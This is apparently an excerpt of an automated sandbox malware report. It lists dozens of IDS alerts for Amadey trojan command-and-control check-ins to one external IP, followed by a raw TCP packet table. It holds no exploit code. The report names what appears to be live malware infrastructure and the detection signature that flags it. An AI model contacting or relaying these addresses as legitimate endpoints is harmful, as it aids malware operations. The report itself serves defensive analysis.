                                        08/29/21-22:27:55.649153TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.446.17.96.36
                                        08/29/21-22:27:56.133362TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.446.17.96.36
                                        08/29/21-22:27:57.047902TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.446.17.96.36
                                        08/29/21-22:27:57.412005TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.446.17.96.36
                                        08/29/21-22:27:58.270724TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.446.17.96.36
                                        08/29/21-22:27:58.540244TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.446.17.96.36
                                        08/29/21-22:27:58.811076TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.446.17.96.36
                                        08/29/21-22:27:59.039788TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.446.17.96.36
                                        08/29/21-22:27:59.288894TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.446.17.96.36
                                        08/29/21-22:27:59.530546TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.446.17.96.36
                                        08/29/21-22:27:59.772951TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.446.17.96.36
                                        08/29/21-22:28:00.000924TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.446.17.96.36
                                        08/29/21-22:28:00.239122TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.446.17.96.36
                                        08/29/21-22:28:00.470862TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.446.17.96.36
                                        08/29/21-22:28:00.689237TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.446.17.96.36
                                        08/29/21-22:28:00.925253TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.446.17.96.36
                                        08/29/21-22:28:01.161342TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.446.17.96.36
                                        08/29/21-22:28:01.374512TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.446.17.96.36
                                        08/29/21-22:28:01.609302TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.446.17.96.36
                                        08/29/21-22:28:01.840263TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.446.17.96.36
                                        08/29/21-22:28:02.078276TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.446.17.96.36
                                        08/29/21-22:28:02.300125TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.446.17.96.36
                                        08/29/21-22:28:02.539151TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.446.17.96.36
                                        08/29/21-22:28:02.816734TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.446.17.96.36
                                        08/29/21-22:28:03.052992TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.446.17.96.36
                                        08/29/21-22:28:03.286887TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.446.17.96.36
                                        08/29/21-22:28:03.535960TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.446.17.96.36
                                        08/29/21-22:28:03.836006TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.446.17.96.36
                                        08/29/21-22:28:04.121619TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.446.17.96.36
                                        08/29/21-22:28:04.365881TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.446.17.96.36
                                        08/29/21-22:28:04.677036TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.446.17.96.36
                                        08/29/21-22:28:04.908091TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.446.17.96.36
                                        08/29/21-22:28:05.222320TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.446.17.96.36
                                        08/29/21-22:28:05.492662TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.446.17.96.36
                                        08/29/21-22:28:05.743714TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.446.17.96.36
                                        08/29/21-22:28:06.044957TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.446.17.96.36
                                        08/29/21-22:28:06.278475TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.446.17.96.36
                                        08/29/21-22:28:06.559009TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.446.17.96.36
                                        08/29/21-22:28:06.790170TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.446.17.96.36
                                        08/29/21-22:28:07.138974TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.446.17.96.36
                                        08/29/21-22:28:07.363717TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.446.17.96.36
                                        08/29/21-22:28:07.653723TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.446.17.96.36
                                        08/29/21-22:28:08.131700TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.446.17.96.36
                                        08/29/21-22:28:08.439291TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.446.17.96.36
                                        08/29/21-22:28:08.745563TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.446.17.96.36
                                        08/29/21-22:28:08.980228TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.446.17.96.36
                                        08/29/21-22:28:09.345271TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.446.17.96.36
                                        08/29/21-22:28:09.618007TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.446.17.96.36
                                        08/29/21-22:28:09.974067TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.446.17.96.36
                                        08/29/21-22:28:10.275663TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.446.17.96.36
                                        08/29/21-22:28:10.515578TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.446.17.96.36
                                        08/29/21-22:28:10.819044TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.446.17.96.36
                                        08/29/21-22:28:19.021507TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.446.17.96.36
                                        08/29/21-22:28:19.300780TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.446.17.96.36
                                        08/29/21-22:28:19.556567TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.446.17.96.36
                                        08/29/21-22:28:19.858358TCP2027700ET TROJAN Amadey CnC Check-In4995480192.168.2.446.17.96.36
                                        08/29/21-22:28:20.192168TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.446.17.96.36
                                        08/29/21-22:28:20.494779TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.446.17.96.36
                                        08/29/21-22:28:20.908024TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.446.17.96.36
                                        08/29/21-22:28:21.206777TCP2027700ET TROJAN Amadey CnC Check-In4995980192.168.2.446.17.96.36
                                        08/29/21-22:28:21.508351TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.446.17.96.36
                                        08/29/21-22:28:21.845363TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.446.17.96.36
                                        08/29/21-22:28:22.108160TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.446.17.96.36
                                        08/29/21-22:28:22.521175TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.446.17.96.36
                                        08/29/21-22:28:22.834120TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.446.17.96.36
                                        08/29/21-22:28:23.203746TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.446.17.96.36
                                        08/29/21-22:28:23.736784TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.446.17.96.36
                                        08/29/21-22:28:24.011387TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.446.17.96.36
                                        08/29/21-22:28:28.312151TCP2027700ET TROJAN Amadey CnC Check-In4997280192.168.2.446.17.96.36
                                        08/29/21-22:28:28.577480TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.446.17.96.36
                                        08/29/21-22:28:37.833103TCP2027700ET TROJAN Amadey CnC Check-In4997580192.168.2.446.17.96.36
                                        08/29/21-22:28:38.140650TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.446.17.96.36
                                        08/29/21-22:28:38.485871TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.446.17.96.36
                                        08/29/21-22:28:38.713372TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.446.17.96.36
                                        08/29/21-22:28:39.113108TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.446.17.96.36
                                        08/29/21-22:28:39.386573TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.446.17.96.36
                                        08/29/21-22:28:39.803431TCP2027700ET TROJAN Amadey CnC Check-In4998480192.168.2.446.17.96.36
                                        08/29/21-22:28:40.094607TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.446.17.96.36
                                        08/29/21-22:28:49.401187TCP2027700ET TROJAN Amadey CnC Check-In4998780192.168.2.446.17.96.36
                                        08/29/21-22:28:49.642772TCP2027700ET TROJAN Amadey CnC Check-In4998980192.168.2.446.17.96.36
                                        08/29/21-22:28:50.839502TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.446.17.96.36
                                        08/29/21-22:28:52.083343TCP2027700ET TROJAN Amadey CnC Check-In4999280192.168.2.446.17.96.36
                                        08/29/21-22:28:53.327420TCP2027700ET TROJAN Amadey CnC Check-In4999380192.168.2.446.17.96.36
                                        08/29/21-22:28:53.582919TCP2027700ET TROJAN Amadey CnC Check-In4999580192.168.2.446.17.96.36
                                        08/29/21-22:28:53.874198TCP2027700ET TROJAN Amadey CnC Check-In4999680192.168.2.446.17.96.36
                                        08/29/21-22:28:54.192005TCP2027700ET TROJAN Amadey CnC Check-In4999880192.168.2.446.17.96.36
                                        08/29/21-22:28:54.579511TCP2027700ET TROJAN Amadey CnC Check-In4999980192.168.2.446.17.96.36
                                        08/29/21-22:28:54.906679TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.446.17.96.36
                                        08/29/21-22:28:55.221076TCP2027700ET TROJAN Amadey CnC Check-In5000280192.168.2.446.17.96.36
                                        08/29/21-22:28:55.514737TCP2027700ET TROJAN Amadey CnC Check-In5000480192.168.2.446.17.96.36
                                        08/29/21-22:28:55.960549TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.446.17.96.36
                                        08/29/21-22:28:56.250918TCP2027700ET TROJAN Amadey CnC Check-In5000780192.168.2.446.17.96.36
                                        08/29/21-22:28:56.511308TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.446.17.96.36
                                        08/29/21-22:28:56.850095TCP2027700ET TROJAN Amadey CnC Check-In5001080192.168.2.446.17.96.36
                                        08/29/21-22:28:57.284671TCP2027700ET TROJAN Amadey CnC Check-In5001180192.168.2.446.17.96.36
                                        08/29/21-22:28:57.606739TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.446.17.96.36
                                        08/29/21-22:28:57.938376TCP2027700ET TROJAN Amadey CnC Check-In5001480192.168.2.446.17.96.36
                                        08/29/21-22:28:58.227840TCP2027700ET TROJAN Amadey CnC Check-In5001680192.168.2.446.17.96.36
                                        08/29/21-22:28:58.529923TCP2027700ET TROJAN Amadey CnC Check-In5001780192.168.2.446.17.96.36
                                        08/29/21-22:28:59.046657TCP2027700ET TROJAN Amadey CnC Check-In5001880192.168.2.446.17.96.36
                                        08/29/21-22:28:59.546882TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.446.17.96.36
                                        08/29/21-22:28:59.826788TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.446.17.96.36
                                        08/29/21-22:29:00.381590TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.446.17.96.36
                                        08/29/21-22:29:00.696637TCP2027700ET TROJAN Amadey CnC Check-In5002480192.168.2.446.17.96.36
                                        08/29/21-22:29:00.970295TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.446.17.96.36
                                        08/29/21-22:29:01.327608TCP2027700ET TROJAN Amadey CnC Check-In5002780192.168.2.446.17.96.36
                                        08/29/21-22:29:01.656149TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.446.17.96.36
                                        08/29/21-22:29:01.955693TCP2027700ET TROJAN Amadey CnC Check-In5003080192.168.2.446.17.96.36
                                        08/29/21-22:29:02.216598TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.446.17.96.36
                                        08/29/21-22:29:02.525419TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.446.17.96.36
                                        08/29/21-22:29:02.801574TCP2027700ET TROJAN Amadey CnC Check-In5003580192.168.2.446.17.96.36
                                        08/29/21-22:29:03.142312TCP2027700ET TROJAN Amadey CnC Check-In5003780192.168.2.446.17.96.36
                                        08/29/21-22:29:03.528788TCP2027700ET TROJAN Amadey CnC Check-In5003880192.168.2.446.17.96.36
                                        08/29/21-22:29:04.018116TCP2027700ET TROJAN Amadey CnC Check-In5003980192.168.2.446.17.96.36
                                        08/29/21-22:29:04.296752TCP2027700ET TROJAN Amadey CnC Check-In5004080192.168.2.446.17.96.36
                                        08/29/21-22:29:04.552432TCP2027700ET TROJAN Amadey CnC Check-In5004280192.168.2.446.17.96.36
                                        08/29/21-22:29:04.848568TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.446.17.96.36
                                        08/29/21-22:29:05.037400TCP2027700ET TROJAN Amadey CnC Check-In5004480192.168.2.446.17.96.36
                                        08/29/21-22:29:05.363694TCP2027700ET TROJAN Amadey CnC Check-In5004580192.168.2.446.17.96.36
                                        08/29/21-22:29:05.621556TCP2027700ET TROJAN Amadey CnC Check-In5004780192.168.2.446.17.96.36
                                        08/29/21-22:29:06.120485TCP2027700ET TROJAN Amadey CnC Check-In5004880192.168.2.446.17.96.36
                                        08/29/21-22:29:06.410758TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.446.17.96.36
                                        08/29/21-22:29:06.709253TCP2027700ET TROJAN Amadey CnC Check-In5005180192.168.2.446.17.96.36
                                        08/29/21-22:29:07.041423TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.446.17.96.36
                                        08/29/21-22:29:07.333309TCP2027700ET TROJAN Amadey CnC Check-In5005480192.168.2.446.17.96.36
                                        08/29/21-22:29:07.641004TCP2027700ET TROJAN Amadey CnC Check-In5005580192.168.2.446.17.96.36
                                        08/29/21-22:29:08.129369TCP2027700ET TROJAN Amadey CnC Check-In5005680192.168.2.446.17.96.36

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 29, 2021 22:27:08.873385906 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.880204916 CEST4973580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.906152964 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.906270981 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.907227039 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.907447100 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.907607079 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.907707930 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.913052082 CEST804973546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.913183928 CEST4973580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.914541006 CEST4973580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.939810991 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.939955950 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.940341949 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.940382004 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.940452099 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.940483093 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.940500975 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.940529108 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.940597057 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.940609932 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.940814018 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.940896034 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.948858976 CEST804973546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.973356009 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.973484039 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.973659039 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.973696947 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.973731995 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.973766088 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.973788977 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.973807096 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.974024057 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.974107981 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.974149942 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.974164963 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.974267960 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.974308014 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.974360943 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.974412918 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.974589109 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.974692106 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:08.995714903 CEST804973546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:08.995820045 CEST4973580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.006266117 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.006360054 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.006531000 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.006557941 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.006680965 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.006952047 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.006977081 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.007023096 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.007024050 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.007055044 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.007061005 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.007236004 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.007265091 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.007618904 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.008898973 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.011858940 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.011889935 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.011945963 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.011976957 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.012001038 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.012033939 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.012082100 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.038986921 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.039041042 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.039196014 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.039459944 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.039522886 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.039618969 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.039681911 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.039757967 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.039961100 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.040025949 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.081614971 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.081698895 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.121078968 CEST4973680192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.137737036 CEST8049736162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.137845039 CEST4973680192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.138505936 CEST4973680192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.155096054 CEST8049736162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.160326958 CEST8049736162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.160399914 CEST4973680192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.166062117 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.183512926 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.183640003 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.211503029 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.229088068 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.235079050 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.235101938 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.235199928 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.235239029 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.304382086 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.305628061 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.305910110 CEST4973580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.306891918 CEST4973880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.321527004 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.321809053 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.321913004 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.338294983 CEST804973446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.338373899 CEST4973480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.338476896 CEST804973546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.338548899 CEST4973580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.339174986 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.342117071 CEST804973846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.342222929 CEST4973880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.342900991 CEST4973880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.342928886 CEST4973880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.342988968 CEST4973880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.343051910 CEST4973880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.356276035 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.378213882 CEST804973846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.378258944 CEST804973846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.378295898 CEST804973846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.378411055 CEST804973846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.378416061 CEST4973880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.378479004 CEST4973880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.378598928 CEST804973846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.378632069 CEST804973846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.378663063 CEST4973880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.378770113 CEST4973880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.378813028 CEST804973846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.378873110 CEST4973880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.378917933 CEST804973846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:09.379040003 CEST4973880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:09.389578104 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.389602900 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.389621019 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.389646053 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.389662981 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.389681101 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.389689922 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.389714003 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.389714956 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.389733076 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.389765978 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.389781952 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.389975071 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.390028954 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.390033007 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.390053988 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.390081882 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.390110970 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.390324116 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.390376091 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.390593052 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.390642881 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.390647888 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.390669107 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.390693903 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.390693903 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.390713930 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.390744925 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.391412020 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.391443968 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.391469002 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.391484022 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.391493082 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.391525984 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.391566038 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.392280102 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.392309904 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.392333031 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.392359972 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.392360926 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.392402887 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.392436028 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.393109083 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.393134117 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.393162012 CEST44349737162.159.134.233192.168.2.4
                                        Aug 29, 2021 22:27:09.393183947 CEST49737443192.168.2.4162.159.134.233
                                        Aug 29, 2021 22:27:09.393186092 CEST44349737162.159.134.233192.168.2.4
